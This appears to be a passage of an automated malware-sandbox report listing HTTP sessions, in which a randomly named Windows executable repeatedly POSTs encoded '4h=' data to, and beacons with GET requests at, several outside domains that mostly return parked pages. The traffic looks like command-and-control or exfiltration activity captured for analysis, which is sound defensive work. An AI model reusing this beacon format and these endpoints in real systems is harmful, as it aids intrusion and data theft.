                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=6mAgDCmfBwgjIn2QuvC9mtYWvKiGbtoQm5YpEnG+djrpXrINOEWVWnBhFWAPHfqXktOY/UL/kLJxRfrLGc4TG6ozJLogKnzqceEKLPkeXEV4/sPR1TrpPHSZlgUMU0wNLN75rWIm4bUOKI7r+tWoN5q0kH3/TRdkbIolKstMTZjL1e9fNNz5bFXvV+YrL1XbvV5lvPmiSNlK548X2j2yw9b6HfEENX/AOYSyQQc=
                                  May 27, 2024 12:35:22.257164001 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:21 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: b2d7d3a0-8243-40e9-8fd3-f0f0df7343b2
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=b2d7d3a0-8243-40e9-8fd3-f0f0df7343b2; expires=Mon, 27 May 2024 10:50:22 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:22.257313967 CEST | 595 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjJkN2QzYTAtODI0My00MGU5LThmZDMtZjBmMGRmNzM0M2IyIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  19 | 192.168.2.7 | 49730 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:24.320874929 CEST | 1802 | OUT | POST /61qh/ HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.drdavidglassman.com
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.drdavidglassman.com/61qh/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h= [TRUNCATED]
                                  May 27, 2024 12:35:24.774677992 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:24 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1142
                                  x-request-id: 4de8139d-4cdc-41f7-aac3-38e2233cee95
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==
                                  set-cookie: parking_session=4de8139d-4cdc-41f7-aac3-38e2233cee95; expires=Mon, 27 May 2024 10:50:24 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kKbi7a7KSvzC8ZHooZk47ntWva6e8enTx16ak6pdRIE34IpDw3TODTTx2bh+PJR6pL6B+NqnRMxHunbammF7KA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:24.774734020 CEST | 595 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGRlODEzOWQtNGNkYy00MWY3LWFhYzMtMzhlMjIzM2NlZTk1IiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  20 | 192.168.2.7 | 49731 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:26.855751038 CEST | 494 | OUT | GET /61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.drdavidglassman.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:27.330077887 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:27 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1522
                                  x-request-id: 4309756b-0b3b-4b35-8f74-1e2177d42eed
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XE26VrHR70uM6/Udl9tMY62wHugD1KhPYKaDpAtnryRcmK4VOQnaMcavSfv9Jrcy3CK6mhY7K9G6aW8OyqIdnQ==
                                  set-cookie: parking_session=4309756b-0b3b-4b35-8f74-1e2177d42eed; expires=Mon, 27 May 2024 10:50:27 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_XE26VrHR70uM6/Udl9tMY62wHugD1KhPYKaDpAtnryRcmK4VOQnaMcavSfv9Jrcy3CK6mhY7K9G6aW8OyqIdnQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:27.330101967 CEST | 224 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDMwOTc1NmItMGIzYi00YjM1LThmNzQtMWUyMTc3ZDQyZWVkIiwicGFnZV9
                                  May 27, 2024 12:35:27.330115080 CEST | 751 | IN
                                  Data Ascii: 0aW1lIjoxNzE2ODA2MTI3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZHJkYXZpZGdsYXNzbWFuLmNvbS82MXFoLz80aD0za29BQTNTT0l5d0lCUkMzdGQvbTl1QU9vSjJ2VXIwODI1NFlFenkrVUhuQkxhNVRmMWUwWTJkMUcyZ2VPc2lkNXY2RGxtejBqTkI3RHRiYUpPVXJSWVozTG9vOWZITGVFT1FiTnM5a1JsNGIxNC9HM2


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  21 | 192.168.2.7 | 49732 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:32.480165958 CEST | 772 | OUT | POST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=tSdLfjuydzdzIgSXX5F0b7yu9469Rz8RrdHA671GHSwwuzdrqxNz0dqt4bRBUGjKwK58b9SHAFdoOHF9yf60UEhcxCNsSxUDC9TdUQGgnDZ7pck22QIHaUcivCwKrBNoT1bps0PwFIAOLt0FmzUcqqJZCsJgnVjKZ/3ehAymc6c2gBXU0oL/Y3BfQalUJwd3WOCMpBYLcZi1bX6gBg==
                                  May 27, 2024 12:35:32.942826986 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:32 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: dae7895c-ca36-49e6-b177-ce966b57ca8f
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=dae7895c-ca36-49e6-b177-ce966b57ca8f; expires=Mon, 27 May 2024 10:50:32 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:32.942873001 CEST | 599 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGFlNzg5NWMtY2EzNi00OWU2LWIxNzctY2U5NjZiNTdjYThmIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  22 | 192.168.2.7 | 49733 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:35.066447973 CEST | 792 | OUT | POST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=tSdLfjuydzdzaxiXb6d0dbyhho69YT8drc7A6/lsEgUwuRFrrz1z3dqtw7RAJWj/wKkBb9uHAFJoOGV91u61VUha9iNuRBUDC9TdUQSKnCx7ot02kEcEbUcjoCwK9xNkT1bbs264FL4OLskFmCUbgqJbMMI/vFW0cfykh3CIGdIcoXK2uKHTGm5kUYBieWACUPGUkjsqDuHfWFbkXUxttPe6RSEBJW6ZZA4rpvY=
                                  May 27, 2024 12:35:35.525912046 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:35 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: b8c11e3f-8a7a-46a9-bde4-e018140cfce3
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=b8c11e3f-8a7a-46a9-bde4-e018140cfce3; expires=Mon, 27 May 2024 10:50:35 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:35.525933027 CEST | 599 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjhjMTFlM2YtOGE3YS00NmE5LWJkZTQtZTAxODE0MGNmY2UzIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  23 | 192.168.2.7 | 49734 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:37.631027937 CEST | 1805 | OUT | POST /faug/ HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.friendsfavorites.pet
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.friendsfavorites.pet/faug/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h= [TRUNCATED]
                                  May 27, 2024 12:35:38.103174925 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:37 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1146
                                  x-request-id: a401738a-dfd5-437a-aa06-802b10899591
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==
                                  set-cookie: parking_session=a401738a-dfd5-437a-aa06-802b10899591; expires=Mon, 27 May 2024 10:50:38 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hHazujVigpJNO5AHa5gFmIBksfOPm3IprWAhlVzltavNXrC/60wX+bIASGuqdTn9sh16zZbAUm51f7OOMGdidw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:38.103190899 CEST | 599 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTQwMTczOGEtZGZkNS00MzdhLWFhMDYtODAyYjEwODk5NTkxIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  24 | 192.168.2.7 | 49735 | 199.59.243.225 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:40.167095900 CEST | 495 | OUT | GET /faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.friendsfavorites.pet
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:40.641211987 CEST | 1236 | IN | HTTP/1.1 200 OK
                                  date: Mon, 27 May 2024 10:35:40 GMT
                                  content-type: text/html; charset=utf-8
                                  content-length: 1526
                                  x-request-id: ea446925-32fc-4363-bd29-6d287756021c
                                  cache-control: no-store, max-age=0
                                  accept-ch: sec-ch-prefers-color-scheme
                                  critical-ch: sec-ch-prefers-color-scheme
                                  vary: sec-ch-prefers-color-scheme
                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aTE9tiCm+O+OLCC2MObjFajn4X/pKZhEdayK2IXV5lkVOoEouigKukITTqOf6FTBPj/Io4wvH0P8dOUXUJFKFA==
                                  set-cookie: parking_session=ea446925-32fc-4363-bd29-6d287756021c; expires=Mon, 27 May 2024 10:50:40 GMT; path=/
                                  connection: close
                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_aTE9tiCm+O+OLCC2MObjFajn4X/pKZhEdayK2IXV5lkVOoEouigKukITTqOf6FTBPj/Io4wvH0P8dOUXUJFKFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                  May 27, 2024 12:35:40.641407013 CEST | 979 | IN
                                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWE0NDY5MjUtMzJmYy00MzYzLWJkMjktNmQyODc3NTYwMjFjIiwicGFnZV90aW1lIjoxNzE2ODA2MT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  25 | 192.168.2.7 | 49736 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:45.728841066 CEST | 766 | OUT | POST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 215
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=vxDuCaPLP26izUhkoST6OS/FsOrRqGYHDHPUKzyXXosNMNVI4Ww/s0ri64lawMTmHkdEILto3Aw4Z9FZ2Hn+oSj/MmQsLF/zoqWfLVMe4hdfFZIeem/GznCUZZdueb7RgCawibQFtBMuXRSEa512neKzHmtJE9+rMlNXtAx6zmgqBt8sa1coHwGvPCwnIsR69krYJKyH8NqBl5Dzjg==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  26 | 192.168.2.7 | 49737 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:49.279141903 CEST | 786 | OUT | POST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 235
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  Data Ascii: 4h=vxDuCaPLP26iz0Rkqxr6GS/EwerRzWYDDHTUK2K9QecNMvNI5Xw/v0rijIllt8TtHjViIOVo3AU4Z/dZ2WnhpCj5ZWQyWV/zoqWfLRl54g1fFp4efH/F+HCbeZduab7VgCaCieJetCkuXQiEao15seKxa2sKH4LCFFZvnhdJzQAzEbhOAXQEZh+ULAURfKMP/lvAEoGmj6Prori31a17kaRrVTDMp9LiNkNLoPo=


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  27 | 192.168.2.7 | 49738 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:51.819689035 CEST | 1799 | OUT | POST /arkx/ HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Accept-Encoding: gzip, deflate, br
                                  Origin: http://www.featuringnature.de
                                  Connection: close
                                  Content-Length: 1247
                                  Content-Type: application/x-www-form-urlencoded
                                  Cache-Control: max-age=0
                                  Referer: http://www.featuringnature.de/arkx/
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  28 | 192.168.2.7 | 49739 | 3.33.130.190 | 80 | 6704 | C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 27, 2024 12:35:54.368149042 CEST | 493 | OUT | GET /arkx/?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y HTTP/1.1
                                  Host: www.featuringnature.de
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                  Accept-Language: en-US
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
                                  May 27, 2024 12:35:54.833229065 CEST | 414 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 27 May 2024 10:35:54 GMT
                                  Content-Type: text/html
                                  Content-Length: 274
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y"}</script></head></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
